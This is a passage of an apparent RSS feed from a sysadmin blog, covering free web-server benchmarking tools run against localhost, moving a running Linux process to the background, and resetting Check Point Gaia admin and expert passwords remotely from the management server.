<p style="text-align: justify;">AB is a tool for benchmarking your Apache Hypertext Transfer Protocol (HTTP) server. It is designed to give you an impression of how your current Apache installation performs. This especially shows you how many requests per second your Apache installation is capable of serving.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">sudo apt-get update</pre>
<p>Refresh the package database.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"> sudo apt-get install apache2-utils</pre>
<p style="text-align: justify;">Install the apache2-utils package to get access to ApacheBench.</p>
<p style="text-align: justify;">Now you are ready to run benchmark. To isolate any network latency, it is the best idea to run it locally on web-server you want to test. Let’s see how it performs for 5000 requests with a concurrency of 500.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">ab -n 5000 -c 500 http://localhost:80/</pre>
<div id="attachment_574" style="width: 610px" class="wp-caption alignnone"><a href="https://itblogsec.com/wp-content/uploads/2017/02/ab_benchmark.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-574" class="border-image wp-image-574 size-full" src="https://itblogsec.com/wp-content/uploads/2017/02/ab_benchmark.jpg" alt="AB benchmark tool" width="600" height="864" srcset="https://itblogsec.com/wp-content/uploads/2017/02/ab_benchmark.jpg 600w, https://itblogsec.com/wp-content/uploads/2017/02/ab_benchmark-208x300.jpg 208w" sizes="(max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-574" class="wp-caption-text">AB benchmark tool</p></div>
<p style="text-align: justify;">As you can see above, web-server was able to handle <strong>5000 request in 25.905 seconds</strong> and <strong>193.01 requests per 1 second.</strong></p>
<h3><strong>2. Siege</strong></h3>
<p style="text-align: justify;">Siege is an HTTP load testing and benchmarking utility. It has a similar interface to ab, which will make transitioning to the tool almost seamless. Also, instead of testing against a single URL, Siege allows you to test against multiple. This allows for a more real-world simulation of how a user would use your system.</p>
<p>Refresh the package database.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">sudo apt-get update</pre>
<p>So, lets install Siege.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">sudo apt-get install siege</pre>
<p style="text-align: justify;">That was easy, apt-get will resolve dependencies for you so if everything’s gone well you should be able to get stuck right in, lets say we’ve got a WordPress instance under localhost that we want to test, simply run this command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">siege -c 5 -b -t30s 'http://localhost'</pre>
<p>Here’s a quick explanation of the options we’ve used above:</p>
<ul>
<li>-c 5 – run with five concurrent requests</li>
<li>-b – benchmark mode</li>
<li>-t30s – time, run for 30 seconds</li>
<li>http://localhost – the target of the benchmark</li>
</ul>
<div id="attachment_575" style="width: 532px" class="wp-caption alignnone"><a href="https://itblogsec.com/wp-content/uploads/2017/02/siege_benchmark.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-575" class="border-image wp-image-575 size-full" src="https://itblogsec.com/wp-content/uploads/2017/02/siege_benchmark.jpg" alt="Siege benchmark tool" width="522" height="368" srcset="https://itblogsec.com/wp-content/uploads/2017/02/siege_benchmark.jpg 522w, https://itblogsec.com/wp-content/uploads/2017/02/siege_benchmark-300x211.jpg 300w" sizes="(max-width: 522px) 100vw, 522px" /></a><p id="caption-attachment-575" class="wp-caption-text">Siege benchmark tool</p></div>
<p>In the result, server has <strong>100% availability</strong> and was able to serve <strong>247.01 transaction/sec.</strong></p>
<h3><strong>3. jMeter</strong></h3>
<p style="text-align: justify;">jMeter is an Open Source testing software. It is 100% pure Java application for load and performance testing. jMeter is designed to cover categories of tests like load, functional, performance, regression, etc., and it requires JDK 5 or higher.</p>
<p style="text-align: justify;"><strong>Stefano Mazzocchi</strong> of the Apache Software Foundation was the original developer of JMeter. He wrote it primarily to test the performance of Apache JServ (now called as Apache Tomcat project). Apache later redesigned JMeter to enhance the GUI and to add functional testing capabilities.</p>
<p style="text-align: justify;">JMeter is a Java desktop application with a graphical interface that uses the Swing graphical API. It can therefore run on any environment / workstation that accepts a Java virtual machine, for example − Windows, Linux, Mac, etc.</p>
<div id="attachment_576" style="width: 1226px" class="wp-caption alignnone"><a href="https://itblogsec.com/wp-content/uploads/2017/02/jMeter.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-576" class="border-image wp-image-576 size-full" src="https://itblogsec.com/wp-content/uploads/2017/02/jMeter.jpg" alt="Example of jMeter GUI" width="1216" height="649" srcset="https://itblogsec.com/wp-content/uploads/2017/02/jMeter.jpg 1216w, https://itblogsec.com/wp-content/uploads/2017/02/jMeter-300x160.jpg 300w, https://itblogsec.com/wp-content/uploads/2017/02/jMeter-768x410.jpg 768w, https://itblogsec.com/wp-content/uploads/2017/02/jMeter-1024x547.jpg 1024w" sizes="(max-width: 1216px) 100vw, 1216px" /></a><p id="caption-attachment-576" class="wp-caption-text">Example of jMeter GUI</p></div>
<p style="text-align: justify;">As it is quite complex tool, with many functions, you can find detailed tutorial how to use it <a href="https://www.tutorialspoint.com/jmeter/index.htm" target="_blank" rel="noopener noreferrer"><strong>here</strong></a>.<br />
You can download jMeter official tool <a href="http://jmeter.apache.org/download_jmeter.cgi" target="_blank" rel="noopener noreferrer"><strong>here</strong></a>.</p>
<h3><strong>4. Pingdom Website Speed Test</strong></h3>
<p style="text-align: justify;">One of the online tools which can be used for online benchmark and provide useful information. You can specify website you want to test and as results you can obtain load time, response code, content size, file requests etc. Feel free to use it <a href="https://tools.pingdom.com/" target="_blank" rel="noopener noreferrer"><strong>here</strong></a><strong>.</strong></p>
<div id="attachment_577" style="width: 1006px" class="wp-caption alignnone"><a href="https://itblogsec.com/wp-content/uploads/2017/02/pingdom.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-577" class="border-image wp-image-577 size-full" src="https://itblogsec.com/wp-content/uploads/2017/02/pingdom.jpg" alt="Pingdom online benchmark tool" width="996" height="848" srcset="https://itblogsec.com/wp-content/uploads/2017/02/pingdom.jpg 996w, https://itblogsec.com/wp-content/uploads/2017/02/pingdom-300x255.jpg 300w, https://itblogsec.com/wp-content/uploads/2017/02/pingdom-768x654.jpg 768w" sizes="(max-width: 996px) 100vw, 996px" /></a><p id="caption-attachment-577" class="wp-caption-text">Pingdom online benchmark tool</p></div>
<h3><strong>Conclusion</strong></h3>
<p style="text-align: justify;">Beware there are many free tools related with website (web-server) benchmark. Just use google and you can find many variations. As web administrator you should always pay attention to performance of your website. The best approach is to make benchmark periodically and try to optimize web-server for the best results. Good luck!</p>
<p>The post <a href="https://itblogsec.com/web-server-performance-benchmark-for-free/">Web server performance benchmark for FREE</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/web-server-performance-benchmark-for-free/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to put currently running process to background</title>
		<link>https://itblogsec.com/how-to-put-currently-running-process-to-background/</link>
					<comments>https://itblogsec.com/how-to-put-currently-running-process-to-background/#comments</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 24 Jan 2017 18:10:43 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[process]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=415</guid>

					<description><![CDATA[<p>You've just issued time-consuming command in UNIX/LINUX. Suddenly you need to leave or turn off computer but command must be continued and finished in background.</p>
<p>The post <a href="https://itblogsec.com/how-to-put-currently-running-process-to-background/">How to put currently running process to background</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>How to put currently running process to background</h2>
<p style="text-align: justify;">You&#8217;ve just issued time-consuming command in UNIX/LINUX. Suddenly you need to leave or turn off computer but command must be continued and finished in background. Once you have entered command and you don&#8217;t want to interrupt it, please follow instructions below to make it continue running in background</p>
<h3 style="text-align: justify;">First Method</h3>
<p style="text-align: justify;">1. Open new terminal window (or duplicate one currently running)</p>
<p style="text-align: justify;">2. Find out current PID of process which is currently running (in our case it is &#8220;ping 8.8.8.8&#8221;)</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">ps aux | grep ping</pre>
<p><a href="https://itblogsec.com/wp-content/uploads/2017/01/ping_02-1.jpg"><img loading="lazy" decoding="async" class="border-image alignnone wp-image-417 size-full" src="https://itblogsec.com/wp-content/uploads/2017/01/ping_02-1.jpg" alt="Find out PID of current running process" width="704" height="47" srcset="https://itblogsec.com/wp-content/uploads/2017/01/ping_02-1.jpg 704w, https://itblogsec.com/wp-content/uploads/2017/01/ping_02-1-300x20.jpg 300w" sizes="(max-width: 704px) 100vw, 704px" /></a></p>
<p>3. Suspend command identified by PID and run it in background</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">sudo kill -20 12402 sudo kill -18 12402</pre>
<p><a href="https://itblogsec.com/wp-content/uploads/2017/01/ping_03.jpg"><img loading="lazy" decoding="async" class="border-image alignnone wp-image-418 size-full" src="https://itblogsec.com/wp-content/uploads/2017/01/ping_03.jpg" width="328" height="30" srcset="https://itblogsec.com/wp-content/uploads/2017/01/ping_03.jpg 328w, https://itblogsec.com/wp-content/uploads/2017/01/ping_03-300x27.jpg 300w" sizes="(max-width: 328px) 100vw, 328px" /></a></p>
<p>4. In case you want to finish command manually anytime</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">sudo kill 12402</pre>
<p>&nbsp;</p>
<h3 style="text-align: justify;">Second Method</h3>
<p style="text-align: justify;">1. Run some command (in our case ping 8.8.8.8)</p>
<p style="text-align: justify;">2. Press Ctrl + Z to stop (pause) the program and get back to the shell</p>
<p style="text-align: justify;"><a href="https://itblogsec.com/wp-content/uploads/2017/01/ping_04.jpg"><img loading="lazy" decoding="async" class="border-image alignnone wp-image-422 size-full" src="https://itblogsec.com/wp-content/uploads/2017/01/ping_04.jpg" width="531" height="130" srcset="https://itblogsec.com/wp-content/uploads/2017/01/ping_04.jpg 531w, https://itblogsec.com/wp-content/uploads/2017/01/ping_04-300x73.jpg 300w" sizes="(max-width: 531px) 100vw, 531px" /></a></p>
<p style="text-align: justify;">3. Run command in the background</p>
<p style="text-align: justify;"><a href="https://itblogsec.com/wp-content/uploads/2017/01/ping_05.jpg"><img loading="lazy" decoding="async" class="border-image alignnone wp-image-423 size-full" src="https://itblogsec.com/wp-content/uploads/2017/01/ping_05.jpg" width="611" height="126" srcset="https://itblogsec.com/wp-content/uploads/2017/01/ping_05.jpg 611w, https://itblogsec.com/wp-content/uploads/2017/01/ping_05-300x62.jpg 300w" sizes="(max-width: 611px) 100vw, 611px" /></a></p>
<p style="text-align: justify;">4. Now you can close terminal window (putty) and  your process will be running in the background</p>
<p style="text-align: justify;">5. Open new terminal window and check that process is still running</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">ps aux | grep ping</pre>
<p>&nbsp;</p>
<p>The post <a href="https://itblogsec.com/how-to-put-currently-running-process-to-background/">How to put currently running process to background</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/how-to-put-currently-running-process-to-background/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Checkpoint FW GAIA &#8211; remote admin/expert password reset</title>
		<link>https://itblogsec.com/checkpoint-fw-gaia-remote-adminexpert-password-reset/</link>
					<comments>https://itblogsec.com/checkpoint-fw-gaia-remote-adminexpert-password-reset/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 23 Jan 2017 12:40:41 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[checkpoint]]></category>
		<category><![CDATA[gaia]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=387</guid>

					<description><![CDATA[<p>Sometimes you need to reset your admin or expert password in GAIA and you do not have physical access to the machine. Follow procedure to reset passwords remotely from management.</p>
<p>The post <a href="https://itblogsec.com/checkpoint-fw-gaia-remote-adminexpert-password-reset/">Checkpoint FW GAIA &#8211; remote admin/expert password reset</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2 style="text-align: justify;">Checkpoint FW GAIA &#8211; remote admin/expert password reset</h2>
<p style="text-align: justify;">Check Point Gaia is the next generation Secure Operating System for all Check Point Appliances, Open Servers and Virtualized Gateways. Gaia combines the best features from IPSO and SecurePlatform (SPLAT) into a single unified OS providing greater efficiency and robust performance. By upgrading to Gaia, customers will benefit from improved appliance connection capacity and reduced operating costs. With Gaia, IP Appliance customers will gain the ability to leverage the full breadth and power of all Check Point Software Blades.</p>
<p style="text-align: justify;">Sometimes you need to reset your admin or expert password in GAIA and you do not have physical access to the machine. Follow procedure below  to reset passwords remotely from management (of course there must be SIC established before your GW and management you will issue commands from):</p>
<p>1. Switch to the context of the involved Domain that manages your Security Gateway:</p>
<pre class="lang:default decode:true ">[Expert@HostName]# mdsenv &lt;Domain_Name&gt;</pre>
<p>&nbsp;</p>
<p>2. Generate hash for new password &#8211; run the following command and save the generated hash string:</p>
<pre class="lang:default decode:true">[Expert@HostName]# /sbin/grub-md5-crypt  
</pre>
<p>&nbsp;</p>
<p>3. Ensure that the Clish database is unlocked on the remote Security Gateway:</p>
<pre class="lang:default decode:true">[Expert@HostName]# $CPDIR/bin/cprid_util -server &lt;IP_of_Gateway&gt; -verbose rexec -rcmd /bin/clish -s -c 'set config-lock on override'  
</pre>
<p>&nbsp;</p>
<p>4. Change the admin user password:</p>
<pre class="lang:default decode:true ">[Expert@HostName]# $CPDIR/bin/cprid_util -server &lt;IP_of_Gateway&gt; -verbose rexec -rcmd /bin/clish -s -c 'set user admin password-hash &lt;Password_Hash_from_Step_2&gt;'</pre>
<p>&nbsp;</p>
<p>5. You can also change the Expert password:</p>
<pre class="lang:default decode:true ">[Expert@HostName]# $CPDIR/bin/cprid_util -server &lt;IP_of_Gateway&gt; -verbose rexec -rcmd /bin/clish -s -c 'set expert-password-hash &lt;Password_Hash_from_Step_2&gt;'</pre>
<p>&nbsp;</p>
<p>The post <a href="https://itblogsec.com/checkpoint-fw-gaia-remote-adminexpert-password-reset/">Checkpoint FW GAIA &#8211; remote admin/expert password reset</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/checkpoint-fw-gaia-remote-adminexpert-password-reset/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/

Object Caching 0/409 objects using XCache
Page Caching using Disk: Enhanced 

Served from: itblogsec.com @ 2025-11-30 22:29:46 by W3 Total Cache
-->